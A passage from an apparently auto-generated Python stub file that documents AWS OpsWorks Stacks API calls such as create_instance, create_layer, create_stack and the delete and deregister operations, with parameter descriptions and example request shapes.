upgrade_os_to - Specifies the desired Amazon Linux version for instances whose OS you want to upgrade, such as Amazon Linux 2014.09 . You must also set the allow_reboot argument to true.
allow_reboot - Specifies whether to allow AWS OpsWorks Stacks to reboot the instances if necessary, after installing the updates. This argument can be set to either true or false . The default value is false .
For example, to upgrade an instance to Amazon Linux 2014.09, set Args to the following.
{ 'upgrade_os_to':['Amazon Linux 2014.09'], 'allow_reboot':['true'] }
(string) --
(list) --
(string) --
:type Comment: string
:param Comment: A user-defined comment.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It is used to override the corresponding default stack configuration JSON values. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:rtype: dict
:return: {
'DeploymentId': 'string'
}
"""
pass
def create_instance(StackId=None, LayerIds=None, InstanceType=None, AutoScalingType=None, Hostname=None, Os=None, AmiId=None, SshKeyName=None, AvailabilityZone=None, VirtualizationType=None, SubnetId=None, Architecture=None, RootDeviceType=None, BlockDeviceMappings=None, InstallUpdatesOnBoot=None, EbsOptimized=None, AgentVersion=None, Tenancy=None):
"""
Creates an instance in a specified stack. For more information, see Adding an Instance to a Layer .
See also: AWS API Documentation
:example: response = client.create_instance(
StackId='string',
LayerIds=[
'string',
],
InstanceType='string',
AutoScalingType='load'|'timer',
Hostname='string',
Os='string',
AmiId='string',
SshKeyName='string',
AvailabilityZone='string',
VirtualizationType='string',
SubnetId='string',
Architecture='x86_64'|'i386',
RootDeviceType='ebs'|'instance-store',
BlockDeviceMappings=[
{
'DeviceName': 'string',
'NoDevice': 'string',
'VirtualName': 'string',
'Ebs': {
'SnapshotId': 'string',
'Iops': 123,
'VolumeSize': 123,
'VolumeType': 'gp2'|'io1'|'standard',
'DeleteOnTermination': True|False
}
},
],
InstallUpdatesOnBoot=True|False,
EbsOptimized=True|False,
AgentVersion='string',
Tenancy='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type LayerIds: list
:param LayerIds: [REQUIRED]
An array that contains the instance's layer IDs.
(string) --
:type InstanceType: string
:param InstanceType: [REQUIRED]
The instance type, such as t2.micro . For a list of supported instance types, open the stack in the console, choose Instances , and choose + Instance . The Size list contains the currently supported types. For more information, see Instance Families and Types . The parameter values that you use to specify the various types are in the API Name column of the Available Instance Types table.
:type AutoScalingType: string
:param AutoScalingType: For load-based or time-based instances, the type. Windows stacks can use only time-based instances.
:type Hostname: string
:param Hostname: The instance host name.
:type Os: string
:param Os: The instance's operating system, which must be set to one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom .
For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
The default option is the current Amazon Linux version. If you set this parameter to Custom , you must use the CreateInstance action's AmiId parameter to specify the custom AMI that you want to use. Block device mappings are not supported if the value is Custom . For more information on the supported operating systems, see Operating Systems For more information on how to use custom AMIs with AWS OpsWorks Stacks, see Using Custom AMIs .
:type AmiId: string
:param AmiId: A custom AMI ID to be used to create the instance. The AMI should be based on one of the supported operating systems. For more information, see Using Custom AMIs .
Note
If you specify a custom AMI, you must set Os to Custom .
:type SshKeyName: string
:param SshKeyName: The instance's Amazon EC2 key-pair name.
:type AvailabilityZone: string
:param AvailabilityZone: The instance Availability Zone. For more information, see Regions and Endpoints .
:type VirtualizationType: string
:param VirtualizationType: The instance's virtualization type, paravirtual or hvm .
:type SubnetId: string
:param SubnetId: The ID of the instance's subnet. If the stack is running in a VPC, you can use this parameter to override the stack's default subnet ID value and direct AWS OpsWorks Stacks to launch the instance in a different subnet.
:type Architecture: string
:param Architecture: The instance architecture. The default option is x86_64 . Instance types do not necessarily support both architectures. For a list of the architectures that are supported by the different instance types, see Instance Families and Types .
:type RootDeviceType: string
:param RootDeviceType: The instance root device type. For more information, see Storage for the Root Device .
:type BlockDeviceMappings: list
:param BlockDeviceMappings: An array of BlockDeviceMapping objects that specify the instance's block devices. For more information, see Block Device Mapping . Note that block device mappings are not supported for custom AMIs.
(dict) --Describes a block device mapping. This data type maps directly to the Amazon EC2 BlockDeviceMapping data type.
DeviceName (string) --The device name that is exposed to the instance, such as /dev/sdh . For the root device, you can use the explicit device name or you can set this parameter to ROOT_DEVICE and AWS OpsWorks Stacks will provide the correct device name.
NoDevice (string) --Suppresses the specified device included in the AMI's block device mapping.
VirtualName (string) --The virtual device name. For more information, see BlockDeviceMapping .
Ebs (dict) --An EBSBlockDevice that defines how to configure an Amazon EBS volume when the instance is launched.
SnapshotId (string) --The snapshot ID.
Iops (integer) --The number of I/O operations per second (IOPS) that the volume supports. For more information, see EbsBlockDevice .
VolumeSize (integer) --The volume size, in GiB. For more information, see EbsBlockDevice .
VolumeType (string) --The volume type. gp2 for General Purpose (SSD) volumes, io1 for Provisioned IOPS (SSD) volumes, and standard for Magnetic volumes.
DeleteOnTermination (boolean) --Whether the volume is deleted on instance termination.
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true to ensure that your instances have the latest security updates.
:type EbsOptimized: boolean
:param EbsOptimized: Whether to create an Amazon EBS-optimized instance.
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
INHERIT - Use the stack's default agent version setting.
version_number - Use the specified agent version. This value overrides the stack's default setting. To update the agent version, edit the instance configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the instance.
The default setting is INHERIT . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
:type Tenancy: string
:param Tenancy: The instance's tenancy option. The default option is no tenancy, or if the instance is running in a VPC, inherit tenancy settings from the VPC. The following are valid values for this parameter: dedicated , default , or host . Because there are costs associated with changes in tenancy options, we recommend that you research tenancy options before choosing them for your instances. For more information about dedicated hosts, see Dedicated Hosts Overview and Amazon EC2 Dedicated Hosts . For more information about dedicated instances, see Dedicated Instances and Amazon EC2 Dedicated Instances .
:rtype: dict
:return: {
'InstanceId': 'string'
}
"""
pass
def create_layer(StackId=None, Type=None, Name=None, Shortname=None, Attributes=None, CloudWatchLogsConfiguration=None, CustomInstanceProfileArn=None, CustomJson=None, CustomSecurityGroupIds=None, Packages=None, VolumeConfigurations=None, EnableAutoHealing=None, AutoAssignElasticIps=None, AutoAssignPublicIps=None, CustomRecipes=None, InstallUpdatesOnBoot=None, UseEbsOptimizedInstances=None, LifecycleEventConfiguration=None):
"""
Creates a layer. For more information, see How to Create a Layer .
See also: AWS API Documentation
:example: response = client.create_layer(
StackId='string',
Type='aws-flow-ruby'|'ecs-cluster'|'java-app'|'lb'|'web'|'php-app'|'rails-app'|'nodejs-app'|'memcached'|'db-master'|'monitoring-master'|'custom',
Name='string',
Shortname='string',
Attributes={
'string': 'string'
},
CloudWatchLogsConfiguration={
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
CustomInstanceProfileArn='string',
CustomJson='string',
CustomSecurityGroupIds=[
'string',
],
Packages=[
'string',
],
VolumeConfigurations=[
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
EnableAutoHealing=True|False,
AutoAssignElasticIps=True|False,
AutoAssignPublicIps=True|False,
CustomRecipes={
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
InstallUpdatesOnBoot=True|False,
UseEbsOptimizedInstances=True|False,
LifecycleEventConfiguration={
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
)
:type StackId: string
:param StackId: [REQUIRED]
The layer stack ID.
:type Type: string
:param Type: [REQUIRED]
The layer type. A stack cannot have more than one built-in layer of the same type. It can have any number of custom layers. Built-in layers are not available in Chef 12 stacks.
:type Name: string
:param Name: [REQUIRED]
The layer name, which is used by the console.
:type Shortname: string
:param Shortname: [REQUIRED]
For custom layers only, use this parameter to specify the layer's short name, which is used internally by AWS OpsWorks Stacks and by Chef recipes. The short name is also used as the name for the directory where your app files are installed. It can have a maximum of 200 characters, which are limited to the alphanumeric characters, '-', '_', and '.'.
The built-in layers' short names are defined by AWS OpsWorks Stacks. For more information, see the Layer Reference .
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
To create a cluster layer, set the EcsClusterArn attribute to the cluster's ARN.
(string) --
(string) --
:type CloudWatchLogsConfiguration: dict
:param CloudWatchLogsConfiguration: Specifies CloudWatch Logs configuration options for the layer. For more information, see CloudWatchLogsLogStream .
Enabled (boolean) --Whether CloudWatch Logs is enabled for a layer.
LogStreams (list) --A list of configuration options for CloudWatch Logs.
(dict) --Describes the Amazon CloudWatch logs configuration for a layer. For detailed information about members of this data type, see the CloudWatch Logs Agent Reference .
LogGroupName (string) --Specifies the destination log group. A log group is created automatically if it doesn't already exist. Log group names can be between 1 and 512 characters long. Allowed characters include a-z, A-Z, 0-9, '_' (underscore), '-' (hyphen), '/' (forward slash), and '.' (period).
DatetimeFormat (string) --Specifies how the time stamp is extracted from logs. For more information, see the CloudWatch Logs Agent Reference .
TimeZone (string) --Specifies the time zone of log event time stamps.
File (string) --Specifies log files that you want to push to CloudWatch Logs.
File can point to a specific file or multiple files (by using wild card characters such as /var/log/system.log* ). Only the latest file is pushed to CloudWatch Logs, based on file modification time. We recommend that you use wild card characters to specify a series of files of the same type, such as access_log.2014-06-01-01 , access_log.2014-06-01-02 , and so on by using a pattern like access_log.* . Don't use a wildcard to match multiple file types, such as access_log_80 and access_log_443 . To specify multiple, different file types, add another log stream entry to the configuration file, so that each log file type is stored in a different log group.
Zipped files are not supported.
FileFingerprintLines (string) --Specifies the range of lines for identifying a file. The valid values are one number, or two dash-delimited numbers, such as '1', '2-5'. The default value is '1', meaning the first line is used to calculate the fingerprint. Fingerprint lines are not sent to CloudWatch Logs unless all specified lines are available.
MultiLineStartPattern (string) --Specifies the pattern for identifying the start of a log message.
InitialPosition (string) --Specifies where to start to read data (start_of_file or end_of_file). The default is start_of_file. This setting is only used if there is no state persisted for that log stream.
Encoding (string) --Specifies the encoding of the log file so that the file can be read correctly. The default is utf_8 . Encodings supported by Python codecs.decode() can be used here.
BufferDuration (integer) --Specifies the time duration for the batching of log events. The minimum value is 5000ms and default value is 5000ms.
BatchCount (integer) --Specifies the max number of log events in a batch, up to 10000. The default value is 1000.
BatchSize (integer) --Specifies the maximum size of log events in a batch, in bytes, up to 1048576 bytes. The default value is 32768 bytes. This size is calculated as the sum of all event messages in UTF-8, plus 26 bytes for each log event.
:type CustomInstanceProfileArn: string
:param CustomInstanceProfileArn: The ARN of an IAM profile to be used for the layer's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type CustomJson: string
:param CustomJson: A JSON-formatted string containing custom stack configuration and deployment attributes to be installed on the layer's instances. For more information, see Using Custom JSON . This feature is supported as of version 1.7.42 of the AWS CLI.
:type CustomSecurityGroupIds: list
:param CustomSecurityGroupIds: An array containing the layer custom security group IDs.
(string) --
:type Packages: list
:param Packages: An array of Package objects that describes the layer packages.
(string) --
:type VolumeConfigurations: list
:param VolumeConfigurations: A VolumeConfigurations object that describes the layer's Amazon EBS volumes.
(dict) --Describes an Amazon EBS volume configuration.
MountPoint (string) -- [REQUIRED]The volume mount point. For example '/dev/sdh'.
RaidLevel (integer) --The volume RAID level .
NumberOfDisks (integer) -- [REQUIRED]The number of disks in the volume.
Size (integer) -- [REQUIRED]The volume size.
VolumeType (string) --The volume type:
standard - Magnetic
io1 - Provisioned IOPS (SSD)
gp2 - General Purpose (SSD)
Iops (integer) --For PIOPS volumes, the IOPS per disk.
:type EnableAutoHealing: boolean
:param EnableAutoHealing: Whether to disable auto healing for the layer.
:type AutoAssignElasticIps: boolean
:param AutoAssignElasticIps: Whether to automatically assign an Elastic IP address to the layer's instances. For more information, see How to Edit a Layer .
:type AutoAssignPublicIps: boolean
:param AutoAssignPublicIps: For stacks that are running in a VPC, whether to automatically assign a public IP address to the layer's instances. For more information, see How to Edit a Layer .
:type CustomRecipes: dict
:param CustomRecipes: A LayerCustomRecipes object that specifies the layer custom recipes.
Setup (list) --An array of custom recipe names to be run following a setup event.
(string) --
Configure (list) --An array of custom recipe names to be run following a configure event.
(string) --
Deploy (list) --An array of custom recipe names to be run following a deploy event.
(string) --
Undeploy (list) --An array of custom recipe names to be run following a undeploy event.
(string) --
Shutdown (list) --An array of custom recipe names to be run following a shutdown event.
(string) --
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
To ensure that your instances have the latest security updates, we strongly recommend using the default value of true .
:type UseEbsOptimizedInstances: boolean
:param UseEbsOptimizedInstances: Whether to use Amazon EBS-optimized instances.
:type LifecycleEventConfiguration: dict
:param LifecycleEventConfiguration: A LifeCycleEventConfiguration object that you can use to configure the Shutdown event to specify an execution timeout and enable or disable Elastic Load Balancer connection draining.
Shutdown (dict) --A ShutdownEventConfiguration object that specifies the Shutdown event configuration.
ExecutionTimeout (integer) --The time, in seconds, that AWS OpsWorks Stacks will wait after triggering a Shutdown event before shutting down an instance.
DelayUntilElbConnectionsDrained (boolean) --Whether to enable Elastic Load Balancing connection draining. For more information, see Connection Draining
:rtype: dict
:return: {
'LayerId': 'string'
}
"""
pass
def create_stack(Name=None, Region=None, VpcId=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, UseOpsworksSecurityGroups=None, CustomCookbooksSource=None, DefaultSshKeyName=None, DefaultRootDeviceType=None, AgentVersion=None):
"""
Creates a new stack. For more information, see Create a New Stack .
See also: AWS API Documentation
:example: response = client.create_stack(
Name='string',
Region='string',
VpcId='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
UseOpsworksSecurityGroups=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
DefaultRootDeviceType='ebs'|'instance-store',
AgentVersion='string'
)
:type Name: string
:param Name: [REQUIRED]
The stack name.
:type Region: string
:param Region: [REQUIRED]
The stack's AWS region, such as 'ap-south-1'. For more information about Amazon regions, see Regions and Endpoints .
:type VpcId: string
:param VpcId: The ID of the VPC that the stack is to be launched into. The VPC must be in the stack's region. All instances are launched into this VPC. You cannot change the ID later.
If your account supports EC2-Classic, the default value is no VPC .
If your account does not support EC2-Classic, the default value is the default VPC for the specified region.
If the VPC ID corresponds to a default VPC and you have specified either the DefaultAvailabilityZone or the DefaultSubnetId parameter only, AWS OpsWorks Stacks infers the value of the other parameter. If you specify neither parameter, AWS OpsWorks Stacks sets these parameters to the first valid Availability Zone for the specified region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
It must belong to a VPC in your account that is in the specified region.
You must specify a value for DefaultSubnetId .
For more information on how to use AWS OpsWorks Stacks with a VPC, see Running a Stack in a VPC . For more information on default VPC and EC2-Classic, see Supported Platforms .
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: [REQUIRED]
The stack's AWS Identity and Access Management (IAM) role, which allows AWS OpsWorks Stacks to work with AWS resources on your behalf. You must set this parameter to the Amazon Resource Name (ARN) for an existing IAM role. For more information about IAM ARNs, see Using Identifiers .
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: [REQUIRED]
The Amazon Resource Name (ARN) of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's default operating system, which is installed on every instance unless you specify a different operating system when you create the instance. You can specify one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information, see Using Custom AMIs .
The default option is the current Amazon Linux version. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
:type HostnameTheme: string
:param HostnameTheme: The stack's host name theme, with spaces replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The stack's default Availability Zone, which must be in the specified region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see the VpcId parameter description.
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It can be used to override the corresponding default stack configuration attribute values or to pass data to recipes. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager. When you create a stack we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 11.4.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether the stack uses custom cookbooks.
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. With UseOpsworksSecurityGroups you can instead provide your own custom security groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it, but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate EC2 security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on creation; custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key pair name. The default value is none. If you specify a key pair name, AWS OpsWorks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is the default for all instances in the stack, but you can override it when you create an instance. The default option is instance-store . For more information, see Storage for the Root Device .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is the most recent release of the agent. To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
:rtype: dict
:return: {
'StackId': 'string'
}
"""
pass
def create_user_profile(IamUserArn=None, SshUsername=None, SshPublicKey=None, AllowSelfManagement=None):
"""
Creates a new user profile.
See also: AWS API Documentation
:example: response = client.create_user_profile(
IamUserArn='string',
SshUsername='string',
SshPublicKey='string',
AllowSelfManagement=True|False
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN; this can also be a federated user's ARN.
:type SshUsername: string
:param SshUsername: The user's SSH user name. The allowable characters are [a-z], [A-Z], [0-9], '-', and '_'. If the specified name includes other punctuation marks, AWS OpsWorks Stacks removes them. For example, my.name will be changed to myname . If you do not specify an SSH user name, AWS OpsWorks Stacks generates one from the IAM user name.
:type SshPublicKey: string
:param SshPublicKey: The user's public SSH key.
:type AllowSelfManagement: boolean
:param AllowSelfManagement: Whether users can specify their own SSH public key through the My Settings page. For more information, see Setting an IAM User's Public SSH Key .
:rtype: dict
:return: {
'IamUserArn': 'string'
}
"""
pass
def delete_app(AppId=None):
"""
Deletes a specified app.
See also: AWS API Documentation
:example: response = client.delete_app(
AppId='string'
)
:type AppId: string
:param AppId: [REQUIRED]
The app ID.
"""
pass
def delete_instance(InstanceId=None, DeleteElasticIp=None, DeleteVolumes=None):
"""
Deletes a specified instance, which terminates the associated Amazon EC2 instance. You must stop an instance before you can delete it.
For more information, see Deleting Instances .
See also: AWS API Documentation
:example: response = client.delete_instance(
InstanceId='string',
DeleteElasticIp=True|False,
DeleteVolumes=True|False
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type DeleteElasticIp: boolean
:param DeleteElasticIp: Whether to delete the instance Elastic IP address.
:type DeleteVolumes: boolean
:param DeleteVolumes: Whether to delete the instance's Amazon EBS volumes.
"""
pass
def delete_layer(LayerId=None):
"""
Deletes a specified layer. You must first stop and then delete all associated instances or unassign registered instances. For more information, see How to Delete a Layer .
See also: AWS API Documentation
:example: response = client.delete_layer(
LayerId='string'
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
"""
pass
def delete_stack(StackId=None):
"""
Deletes a specified stack. You must first delete all instances, layers, and apps or deregister registered instances. For more information, see Shut Down a Stack .
See also: AWS API Documentation
:example: response = client.delete_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def delete_user_profile(IamUserArn=None):
"""
Deletes a user profile.
See also: AWS API Documentation
:example: response = client.delete_user_profile(
IamUserArn='string'
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN. This can also be a federated user's ARN.
"""
pass
def deregister_ecs_cluster(EcsClusterArn=None):
"""
Deregisters a specified Amazon ECS cluster from a stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.deregister_ecs_cluster(
EcsClusterArn='string'
)
:type EcsClusterArn: string
:param EcsClusterArn: [REQUIRED]
The cluster's ARN.
"""
pass
def deregister_elastic_ip(ElasticIp=None):
"""
Deregisters a specified Elastic IP address. The address can then be registered by another stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.deregister_elastic_ip(
ElasticIp='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
"""
pass
def deregister_instance(InstanceId=None):
"""
Deregister a registered Amazon EC2 or on-premises instance. This action removes the instance from the stack and returns it to your control. This action can not be used with instances that were created with AWS OpsWorks Stacks.
See also: AWS API Documentation
:example: response = client.deregister_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def deregister_rds_db_instance(RdsDbInstanceArn=None):
"""
Deregisters an Amazon RDS instance.
See also: AWS API Documentation
:example: response = client.deregister_rds_db_instance(
RdsDbInstanceArn='string'
)
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
"""
pass
def deregister_volume(VolumeId=None):
"""
Deregisters an Amazon EBS volume. The volume can then be registered by another stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.deregister_volume(
VolumeId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The AWS OpsWorks Stacks volume ID, which is the GUID that AWS OpsWorks Stacks assigned to the instance when you registered the volume with the stack, not the Amazon EC2 volume ID.
"""
pass
def describe_agent_versions(StackId=None, ConfigurationManager=None):
"""
Describes the available AWS OpsWorks Stacks agent versions. You must specify a stack ID or a configuration manager. DescribeAgentVersions returns a list of available agent versions for the specified stack or configuration manager.
See also: AWS API Documentation
:example: response = client.describe_agent_versions(
StackId='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
}
)
:type StackId: string
:param StackId: The stack ID.
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:rtype: dict
:return: {
'AgentVersions': [
{
'Version': 'string',
'ConfigurationManager': {
'Name': 'string',
'Version': 'string'
}
},
]
}
"""
pass
def describe_apps(StackId=None, AppIds=None):
"""
Requests a description of a specified set of apps.
See also: AWS API Documentation
:example: response = client.describe_apps(
StackId='string',
AppIds=[
'string',
